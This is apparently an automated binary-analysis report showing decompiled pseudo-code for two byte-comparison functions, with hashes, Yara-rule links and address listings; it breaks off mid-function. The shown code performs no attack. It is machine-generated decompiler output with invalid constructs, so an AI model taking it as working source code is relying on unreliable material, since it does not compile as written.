                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                                                                                                                      • Instruction ID: 78895ff4ef9897740547fc240ec4193322f39ffc3cf547d0009f287671033df6
                                                                                                                                                      • Opcode Fuzzy Hash: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                                                                                                                      • Instruction Fuzzy Hash: 60024A72A043518BE708CE28C4D426DBBE2FBC4394F164A3EE89697788D774E945CBD1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000C483, Relevance: .4, Instructions: 384COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000C483(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

































                                                                                                                                                      0x1000c483
                                                                                                                                                      0x1000c483
                                                                                                                                                      0x1000c489
                                                                                                                                                      0x1000c509
                                                                                                                                                      0x1000c50b
                                                                                                                                                      0x1000c50d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c513
                                                                                                                                                      0x1000c519
                                                                                                                                                      0x1000c598
                                                                                                                                                      0x1000c59a
                                                                                                                                                      0x1000c59c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c5a2
                                                                                                                                                      0x1000c5a8
                                                                                                                                                      0x1000c627
                                                                                                                                                      0x1000c629
                                                                                                                                                      0x1000c62b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c631
                                                                                                                                                      0x1000c637
                                                                                                                                                      0x1000c6b6
                                                                                                                                                      0x1000c6b8
                                                                                                                                                      0x1000c6ba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c6c6
                                                                                                                                                      0x1000c746
                                                                                                                                                      0x1000c748
                                                                                                                                                      0x1000c74a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c750
                                                                                                                                                      0x1000c756
                                                                                                                                                      0x1000c7d5
                                                                                                                                                      0x1000c7d7
                                                                                                                                                      0x1000c7d9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c7df
                                                                                                                                                      0x1000c7e5
                                                                                                                                                      0x1000c864
                                                                                                                                                      0x1000c866
                                                                                                                                                      0x1000c868
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c876
                                                                                                                                                      0x1000c878
                                                                                                                                                      0x1000c45b
                                                                                                                                                      0x1000c463
                                                                                                                                                      0x1000c465
                                                                                                                                                      0x1000c041
                                                                                                                                                      0x1000c049
                                                                                                                                                      0x1000c04b
                                                                                                                                                      0x1000c05c
                                                                                                                                                      0x1000c05c
                                                                                                                                                      0x1000bc51
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000c472
                                                                                                                                                      0x1000c478
                                                                                                                                                      0x1000c891
                                                                                                                                                      0x1000c891
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c47e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c47e
                                                                                                                                                      0x1000c478
                                                                                                                                                      0x1000c885
                                                                                                                                                      0x1000c88b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c88b
                                                                                                                                                      0x1000c7ee
                                                                                                                                                      0x1000c7f0
                                                                                                                                                      0x1000c807
                                                                                                                                                      0x1000c80f
                                                                                                                                                      0x1000c811
                                                                                                                                                      0x1000c828
                                                                                                                                                      0x1000c830
                                                                                                                                                      0x1000c832
                                                                                                                                                      0x1000c849
                                                                                                                                                      0x1000c851
                                                                                                                                                      0x1000c853
                                                                                                                                                      0x1000c860
                                                                                                                                                      0x1000c860
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c853
                                                                                                                                                      0x1000c83f
                                                                                                                                                      0x1000c843
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c843
                                                                                                                                                      0x1000c81e
                                                                                                                                                      0x1000c822
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c822
                                                                                                                                                      0x1000c7fd
                                                                                                                                                      0x1000c801
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c801
                                                                                                                                                      0x1000c75f
                                                                                                                                                      0x1000c761
                                                                                                                                                      0x1000c778
                                                                                                                                                      0x1000c780
                                                                                                                                                      0x1000c782
                                                                                                                                                      0x1000c799
                                                                                                                                                      0x1000c7a1
                                                                                                                                                      0x1000c7a3
                                                                                                                                                      0x1000c7ba
                                                                                                                                                      0x1000c7c2
                                                                                                                                                      0x1000c7c4
                                                                                                                                                      0x1000c7d1
                                                                                                                                                      0x1000c7d1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c7c4
                                                                                                                                                      0x1000c7b0
                                                                                                                                                      0x1000c7b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c7b4
                                                                                                                                                      0x1000c78f
                                                                                                                                                      0x1000c793
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c793
                                                                                                                                                      0x1000c76e
                                                                                                                                                      0x1000c772
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c772
                                                                                                                                                      0x1000c6d0
                                                                                                                                                      0x1000c6d2
                                                                                                                                                      0x1000c6e9
                                                                                                                                                      0x1000c6f1
                                                                                                                                                      0x1000c6f3
                                                                                                                                                      0x1000c70a
                                                                                                                                                      0x1000c712
                                                                                                                                                      0x1000c714
                                                                                                                                                      0x1000c72b
                                                                                                                                                      0x1000c733
                                                                                                                                                      0x1000c735
                                                                                                                                                      0x1000c742
                                                                                                                                                      0x1000c742
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c735
                                                                                                                                                      0x1000c721
                                                                                                                                                      0x1000c725
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c725
                                                                                                                                                      0x1000c700
                                                                                                                                                      0x1000c704
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c704
                                                                                                                                                      0x1000c6df
                                                                                                                                                      0x1000c6e3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c6e3
                                                                                                                                                      0x1000c640
                                                                                                                                                      0x1000c642
                                                                                                                                                      0x1000c659
                                                                                                                                                      0x1000c661
                                                                                                                                                      0x1000c663
                                                                                                                                                      0x1000c67a
                                                                                                                                                      0x1000c682
                                                                                                                                                      0x1000c684
                                                                                                                                                      0x1000c69b
                                                                                                                                                      0x1000c6a3
                                                                                                                                                      0x1000c6a5
                                                                                                                                                      0x1000c6b2
                                                                                                                                                      0x1000c6b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c6a5
                                                                                                                                                      0x1000c691
                                                                                                                                                      0x1000c695
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c695
                                                                                                                                                      0x1000c670
                                                                                                                                                      0x1000c674
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c674
                                                                                                                                                      0x1000c64f
                                                                                                                                                      0x1000c653
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c653
                                                                                                                                                      0x1000c5b1
                                                                                                                                                      0x1000c5b3
                                                                                                                                                      0x1000c5ca
                                                                                                                                                      0x1000c5d2
                                                                                                                                                      0x1000c5d4
                                                                                                                                                      0x1000c5eb
                                                                                                                                                      0x1000c5f3
                                                                                                                                                      0x1000c5f5
                                                                                                                                                      0x1000c60c
                                                                                                                                                      0x1000c614
                                                                                                                                                      0x1000c616
                                                                                                                                                      0x1000c623
                                                                                                                                                      0x1000c623
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c616
                                                                                                                                                      0x1000c602
                                                                                                                                                      0x1000c606
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c606
                                                                                                                                                      0x1000c5e1
                                                                                                                                                      0x1000c5e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c5e5
                                                                                                                                                      0x1000c5c0
                                                                                                                                                      0x1000c5c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c5c4
                                                                                                                                                      0x1000c522
                                                                                                                                                      0x1000c524
                                                                                                                                                      0x1000c53b
                                                                                                                                                      0x1000c543
                                                                                                                                                      0x1000c545
                                                                                                                                                      0x1000c55c
                                                                                                                                                      0x1000c564
                                                                                                                                                      0x1000c566
                                                                                                                                                      0x1000c57d
                                                                                                                                                      0x1000c585
                                                                                                                                                      0x1000c587
                                                                                                                                                      0x1000c594
                                                                                                                                                      0x1000c594
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c587
                                                                                                                                                      0x1000c573
                                                                                                                                                      0x1000c577
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c577
                                                                                                                                                      0x1000c552
                                                                                                                                                      0x1000c556
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c556
                                                                                                                                                      0x1000c531
                                                                                                                                                      0x1000c535
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c48b
                                                                                                                                                      0x1000c48b
                                                                                                                                                      0x1000c48f
                                                                                                                                                      0x1000c493
                                                                                                                                                      0x1000c495
                                                                                                                                                      0x1000c4ac
                                                                                                                                                      0x1000c4ac
                                                                                                                                                      0x1000c4b0
                                                                                                                                                      0x1000c4b4
                                                                                                                                                      0x1000c4b6
                                                                                                                                                      0x1000c4cd
                                                                                                                                                      0x1000c4cd
                                                                                                                                                      0x1000c4d1
                                                                                                                                                      0x1000c4d5
                                                                                                                                                      0x1000c4d7
                                                                                                                                                      0x1000c4ee
                                                                                                                                                      0x1000c4ee
                                                                                                                                                      0x1000c4f2
                                                                                                                                                      0x1000c4f6
                                                                                                                                                      0x1000c4f8
                                                                                                                                                      0x1000c4fe
                                                                                                                                                      0x1000c501
                                                                                                                                                      0x1000c505
                                                                                                                                                      0x1000c505
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c4f8
                                                                                                                                                      0x1000c4dd
                                                                                                                                                      0x1000c4e0
                                                                                                                                                      0x1000c4e4
                                                                                                                                                      0x1000c4e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c4e8
                                                                                                                                                      0x1000c4bc
                                                                                                                                                      0x1000c4bf
                                                                                                                                                      0x1000c4c3
                                                                                                                                                      0x1000c4c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c4c7
                                                                                                                                                      0x1000c49b
                                                                                                                                                      0x1000c49e
                                                                                                                                                      0x1000c4a2
                                                                                                                                                      0x1000c4a6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c4a6
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                      • Instruction ID: 3027ded48b29fa4aba4523cd27565e48f2218849e2b53ffec30aeb13d9f91fa8
                                                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                      • Instruction Fuzzy Hash: 48D16F73C0EAF3469375C62D445862EEAA2EFC16D132BC3E1DCD43F29D9A269D4096D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000C063, Relevance: .4, Instructions: 378COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000C063(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
